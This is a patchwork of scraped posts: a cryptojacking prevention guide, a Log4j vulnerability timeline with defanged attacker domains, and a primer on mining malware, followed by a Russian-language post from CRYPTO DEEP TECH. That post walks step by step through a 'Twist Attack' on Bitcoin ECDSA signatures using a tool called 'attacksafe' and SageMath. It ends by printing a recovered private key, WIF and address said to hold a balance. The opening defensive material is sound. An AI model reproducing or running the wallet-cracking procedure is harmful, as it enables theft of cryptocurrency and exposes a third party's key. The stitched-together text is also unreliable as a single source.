help prevent cryptojacking from running rampant on enterprise resources. Employ strong endpoint protection: The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extension to minimize risk of browser-based scripts from executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond. Patch and harden servers (and everything else). Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities. Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks. Use software composition analysis. Software composition analysis (SCA) tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts. Hunt down cloud misconfigurations. One of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications. How to detect cryptojacking Cryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking. Train your help desk to look for signs of cryptomining. Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices. Deploy a network monitoring solution. Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicates cryptojacking activity, no matter the device it is coming from. “If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” ],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method. Use cloud monitoring and container runtime security. Evolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats. Engage in regular threat hunts. Since so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations. “Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says. Monitor your websites for cryptomining code. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves. How to respond to a cryptojacking attack After illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned. Some tips for how to respond to a cryptojacking attack include: Kill web-delivered scripts. For in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it. Shut down compromised container instances. Immutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured. Reduce permissions and regenerate API keys. Eradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerating API keys to prevent attackers from walking right back into the same cloud environment. Learn and adapt. Use the experience to better understand how the attacker was able to compromise your systems. Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly. Editor’s note: This article, orginally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples. The Apache Log4j vulnerabilities: A timeline The Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded. The Apache Log4j vulnerability has made global headlines since it was discovered in early December. The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded. Thursday, December 9: Apache Log4j zero-day exploit discovered Apache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228) – dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version. Friday, December 10: UK NCSC issues Log4j warning to UK organizations As the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a public warning to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking. Saturday, December 11: CISA director comments on “urgent challenge to network defenders” Much like the UK’s NCSC, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a statement. “We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.” CISA recommended asset owners to take three additional, immediate steps to help mitigate the vulnerability: Enumerate any external facing devices that have Log4j installed Ensure security operations centers are actioning every single alert on the devices that fall into the category above Install a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts Tuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released A second vulnerability impacting Apache Log4j was discovered. The new exploit, CVE 2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the CVE description. A new patch for the exploit was made available which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations. “While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j: 2.16.0 as soon as possible. Friday, December 17: Third Log4j vulnerability revealed, new fix made available Apache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. “The Log4j team has been made aware of a security vulnerability, CVE-2021-45105, that has been addressed in Log4j 2.17.0 for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DoS (denial-of-service) attack.” Apache also outlined the following mitigations: In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId}or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input Monday, December 20: Log4j exploited to install Dridex and Meterpreter Cybersecurity research group Cryptolaemus warned that the Log4j vulnerability was being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told BleepingComputer that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Wednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell Data released by cybersecurity vendor Tenable revealed that that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a Tenable blog posting. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on. One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.” The vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added. Tuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action The Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the FTC said. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” Monday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell Microsoft updated its Log4j vulnerability guidance page with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203. Security 101: The Impact of Cryptocurrency-Mining Malware The Australian government has just recognized digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms. Japan, which legitimized bitcoin as a form of payment last April, already expects more than 20,000 merchants to accept bitcoin payments. Other countries are joining the bandwagon, albeit partially: businesses and some of the public organizations in Switzerland, Norway, and the Netherlands. In a recent study, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe. But what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users? What is cryptocurrency? Cryptocurrency is an encrypted data string that denotes a unit of currency. It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions. Cryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency. Bitcoin isn’t the be-all and end-all There are actually over 700 cryptocurrencies, but only some are readily traded and even less have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcasted, validated, and registered in a public, distributed database through a network of communication endpoints (nodes). While bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain. Ethereum, however, earned notoriety after a hacker exploited a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based the original blockchain, and Ethereum, its upgraded version (via a hard fork). There are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero. Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. Monero is notable for its use of ring signatures (a type of digital signature) and CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along. Cryptocurrency mining also drew cybercriminal attention Cryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall. Unfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as ransomware operators showed. The increasing popularity of cryptocurrencies coincide with the incidences of malware that infect systems and devices, turning them into armies of cryptocurrency-mining machines. Cryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment on the hardware, not to mention the electricity costs to power them. Cryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved. Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power increases, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was halved to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. Profit is divided between the group, depending on how much effort a miner exerted. Cryptocurrency-mining malware use similar attack vectors Bad guys turn to using malware to skirt around these challenges. There is, however a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify botnets of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was used to illicitly mine dogecoins. During the same year, a similar incident happened to US agency National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was misused to mine for bitcoins. Cryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). In January 2014, a vulnerability in Yahoo!’s Java-based advertisement network was compromised, exposing European end users to malvertisements that delivered a bitcoin-mining malware. A month before it, German law enforcement arrested hackers for purportedly using malware to mine over $954,000 worth of bitcoins. We’ve seen the emergence of hacking tools and backdoors related to cybercriminal bitcoin mining as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as distributed denial-of-service and URL spoofing. Another even tried to masquerade as a component for one of Trend Micro’s products. In 2014, the threat crossed over to Android devices as Kagecoin, capable of mining bitcoin, litecoin, and dogecoin. A remote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground was modified to add bitcoin-mining functionality. The same was done to an old Java RAT that can mine litecoin. This year’s notable cryptocurrency-mining malware so far are Adylkuzz, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities. Adylkuzz leverages EternalBlue, the same security flaw that WannaCry ransomware used to destructive effect, while CPUMiner/EternalMiner used SambaCry, a vulnerability in interoperability software suite Samba. Linux.MulDrop.14, a Linux Trojan, targets Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets. Cryptocurrency-mining malware’s impact makes them a credible threat Cryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption. But we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector. The most prevalent of these attacks we saw were: Cross-site scripting Exploiting a remote code execution vulnerability in Microsoft’s Internet Information Server (IIS) Brute force and default password logins/attacks Command buffer overflow exploits Hypertext Preprocessor (PHP) arbitrary code injection SQL injection BlackNurse denial of service attack These malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. These attacks can also be the conduit from which additional malware are delivered. Internet of Things (IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from digital video recorders (DVRs)/surveillance cameras, set-top boxes, network-attached storage (NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai surfaced with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to knock high-profile sites offline last year. Over the first three quarters of 2016, we detected a bitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras. From January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017. While bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent. We found that machines running Windows had the most bitcoin mining activities, but also of note are: Systems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7) Devices run on Ubuntu OS, a derivative of Debian Linux OS Home routers Environment-monitoring devices, used in data centers Android-run smart TVs and mobile devices IP cameras Print servers Gaming consoles [READ: How to secure your router against Mirai and home network attacks] Cryptocurrency-mining malware can make victims a part of the problem Cryptocurrency-mining malware can impair system performance and risk end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem. Indeed, their adverse impact to the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices: Regularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems Changing or strengthening the device’s default credentials makes the device less prone to unauthorized access Enabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts Taking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. Applying the principle of least privilege, developing countermeasures against web injections, securing the email gateway, implementing best practices for corporate mobile devices, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play vital roles in securing the ecosystems they run in. https://cryptodeeptech.ru/blockchain-attack-vectors/ Majority is not Enough: Bitcoin Mining is Vulnerable https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/PNDBjoT83zA Source: https://cryptodeep.ru/log4j-vulnerability
  17. CRYPTO DEEP TECH Не так давно пакет elliptic (6.5.4) для стандартных эллиптических кривых был уязвим для различных атак, одним из которых является Twist Attack. Криптографическая проблема была в реализации secp256k1. Нам известно что криптовалюта Биткоин использует secp256k1 и эта атака не обошла Биткоин стороной, согласно уязвимости CVE-2020-28498 подтверждающие стороны транзакции алгоритма ECDSA через определенные точки на эллиптической кривой secp256k1 передавали частичные значение приватного ключа (более простые подгруппы состоящие от 5 до 45 bit ) которые называются секстическими поворотами [sextic twists] этот процесс настолько опасен что раскрывает зашифрованные данные после выполнения ряда операций ECC. В этой статье мы реализуем Twist Attack на примере и покажем как с помощью определенных точек на эллиптической кривой secp256k1 мы можем получить частичные значение приватного ключа и в течение 5-15 минут восстановить Биткоин Кошелек используя “Sagemath pollard rho function: (discrete_log_rho)” и “Chinese Remainder Theorem”. https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md Согласно твиту Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21 The cofactor is 3^2*13^2*3319*22639 E1: 20412485227 E2: 3319, 22639 E3: 109903, 12977017, 383229727 E4: 18979 E6: 10903, 5290657, 10833080827, 22921299619447 prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447 38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031 HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5 E1: y^2 = x^3 + 1 E2: y^2 = x^3 + 2 E3: y^2 = x^3 + 3 E4: y^2 = x^3 + 4 E6: y^2 = x^3 + 6 https://attacksafe.ru/twist-attack-on-bitcoin y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax. Перейдем к экспериментальной части: (Рассмотрим Биткоин Адрес) (Теперь рассмотрим критический уязвимые транзакции) Откроем [TerminalGoogleColab]. Реализуем алгоритм Twist Attack с помощью нашей репозитории 18TwistAttack git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/18TwistAttack/ ls Установим все нужные нам пакеты requirements.txt sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt , Подготовим RawTX для атаки RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Сохраним в файле: RawTX.txt RawTX.txt Чтобы реализовать атаку мы воспользуемся программным обеспечение “ATTACKSAFE SOFTWARE” www.attacksafe.ru/software Права доступа: chmod +x attacksafe Применение: ./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode ./attacksafe -version Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023] "ATTACKSAFE SOFTWARE" включает в себя все популярные атаки на Биткоин. Запустим список всех атак: ./attacksafe -list Выберем -tool: twist_attack Чтобы получить определенные точки secp256k1 из уязвимой транзакции подписи ECDSA, мы добавили данные RawTX в текстовый документ и сохранил как файл RawTX.txt 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Запустим -tool twist_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt Мы запустили данную атаку из -tool twist_attack и результат сохранился в файл SecretPoints.txt Теперь чтобы посмотреть успешный результат откроем файл SecretPoints.txt cat SecretPoints.txt Результат: Elliptic Curve Secret Points: Q11 = E1([34618671789393965854613640290360235391647615481000045539933705415932995630501, 99667531170720247708472095466452031806107030061686920872303526306525502090483]) Q21 = E2([68702062392910446859944685018576437177285905222869560568664822150761686878291, 78930926874118321017229422673239275133078679240453338682049329315217408793256]) Q22 = E2([36187226669165513276610993963284034580749604088670076857796544959800936658648, 78047996896912977465701149036258546447875229540566494608083363212907320694556]) Q31 = E3([14202326166782503089885498550308551381051624037047010679115490407616052746319, 30141335236272151189582083030021707964727207106390862186771517460219968539461]) Q32 = E3([92652014076758100644785068345546545590717837495536733539625902385181839840915, 110864801034380605661536039273640968489603707115084229873394641092410549997600]) Q33 = E3([13733962489803830542904605575055556603039713775204829607439941608751927073977, 70664870695578622971339822919870548708506276012055865037147804103600164648175]) Q41 = E4([46717592694718488699519343483827728052018707080103013431011626167943885955457, 6469304805650436779501027074909634426373884406581114581098958955015476304831]) Q61 = E6([47561520942485905499349109889401345889145902913672896164353162929760278620178, 23509073020931558264499314846549082835888014703370452565866789873039982616042]) Q62 = E6([54160295444050675202099928029758489687871616334443609215013972520342661686310, 61948858375012652103923933825519305763658240249902247802977736768072021476029]) Q63 = E6([80766121303237997819855855617475110324697780810565482439175845706674419107782, 43455623036669369134087288965186672649514660807369135243341314597351364060230]) Q64 = E6([27687597533944257266141093122549631098147853637408570994849207294960615279263, 8473112666362672787600475720236754473089370067288223871796416412432107486062]) RawTX = 0100000001ea20b8f18674f029b84a96fad22647eec129e0e5520c73a25c24a42ad3479c78100000006a47304402207eed07b5b09237851306a44a2b0f6bc2db0e2eaca45296a84ace41f8d2f5ccdb02205e4eebbaffdd48f2294c062ac1d34204d7bcb01d76ead96720cc9c6c570f8a0801210277144138c5d2e090d6cf65c8fc984cce82c39d2923c4e106a27e3e6bb92de4abffffffff013a020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000 Теперь добавим полученные точки secp256k1 Для этого откроем Python-script: discrete.py Для того чтобы запустить Python-script: discrete.py установим SageMath Команда установки: sudo apt-get update sudo apt-get install -y python3-gmpy2 yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath Проверим установку SageMath по команде: sage -v SageMath version 9.0 Чтобы решить дискретное логарифмирование (Pollard's rho algorithm for logarithms) запустим Python-script: discrete.py Команда запуска: sage -python3 discrete.py Результат: Discrete_log_rho: 5663673254 229 19231 43549 11713353 47161820 13016 6068 1461826 5248038982 9034433903442 PRIVATE KEY: 4843137891892877119728403798088723017104154997204069979961743654961499092503 privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64]) Конвертируем приватный ключ в HEX формат Десятичный формат приватного ключа был сохранен в файл: privkey.txt Запустим Python-script: privkey2hex.py python3 privkey2hex.py cat privkey2hex.txt Откроем полученный файл: privkey2hex.txt Приватный ключ в HEX формате: PrivKey = 0ab51e7092866dadf86165ea0d70beb69086237a0e7f5a123d496d3d98e03617 Откроем bitaddress и проверим: ADDR: 1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq WIF: KwaXPrvbWF5USy3GCh453UDGWXnBSroiKKtE6ebtmHHxGKaRmVD6 HEX: 0AB51E7092866DADF86165EA0D70BEB69086237A0E7F5A123D496D3D98E03617 https://live.blockcypher.com/btc/address/1J7TUsfVc58ao6qYjcUhzKW1LxxiZ57vCq/ BALANCE: $ 775.77 Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/S_ZUcM2cD8I Источник: https://cryptodeep.ru/twist-attack Криптоанализ
  18. CRYPTO DEEP TECH In the last article: “Blockchain Attack Vectors & Vulnerabilities to Smart Contracts” we reviewed all known attacks on the blockchain, in this article we will talk about crypto threats again and we will talk about identifying vulnerabilities for Cold wallets, as well as for Hot wallets. Blockchain is the underlying tech layer made up of a decentralized ledger, and a very secure data structure as there are a lot of distributed nodes that participate in the consensus algorithm. In order to hack the blockchain, hackers should exploit vulnerabilities in a lot of decentralized nodes. The basic security assumption of blockchain is that it is impossible to hack so many nodes to change the state of the blockchain. If blockchain tech is so secure, how could it be hacked? The Achilles Heal of the technology is the centralized nature of institutional users that manage large amounts of crypto assets (money) for their clients, while the only thing that stays between the money and the hackers is the private key. The private key should be used to sign, on blockchain transactions, the same way that a manual signature could be used to sign traditional checks. If someone steals the institutions’ private key they can create a transaction on their behalf and steal the money. Unlike bank systems – once a hacked transaction is created there is no way to reverse it – the money is literally stolen. Why is it important to store and safeguard your private key? Whoever holds the private keys has complete control over the assets associated with that key. Because blockchain transactions are instantaneous and irrevocable, users aim to keep their private key secret. The private key is only generated once, so misplacing a private key effectively renders useless all the crypto assets associated with that address. Although the optimal custody scenario has yet to be defined, it is undisputed that control of the private key is of paramount concern. In fact, the private key is, in essence, the real asset. It’s intrinsic properties and powers mean there is no way to truly safeguard it without exception. Cold wallets “The vault of institutional custodians” are hardware devices that store Bitcoin or other cryptocurrencies initially, internet isolated, device. In theory, the cold wallet solution is reported to be the most secure way to store cryptocurrency. Some cryptocurrency users prefer to keep their digital assets in a physical “wallet,” most often a device that looks like a USB stick; they can only be accessed by being plugged directly into a computer and require an internet connection in order for a user to access and move their cryptocurrency funds. There are several popular cold wallets for commercial use such as Trezor, Ledger Nano S and for enterprise and institutional investors some other devices use a combination of: USB Ethernet SD card External thumb drives Dedicated air gapped machine with HSM Problems associated with the above hardware is usability and to gain access to the crypto asset you need to connect the cold wallet to a computer and therefore it is exposed to the internet. By doing so you are compromising the cold wallet system through the Internet connection, thus exposing it to potential attack vectors and eventually potential cyber theft. Using cold wallet storage is a necessary security precaution, especially when dealing 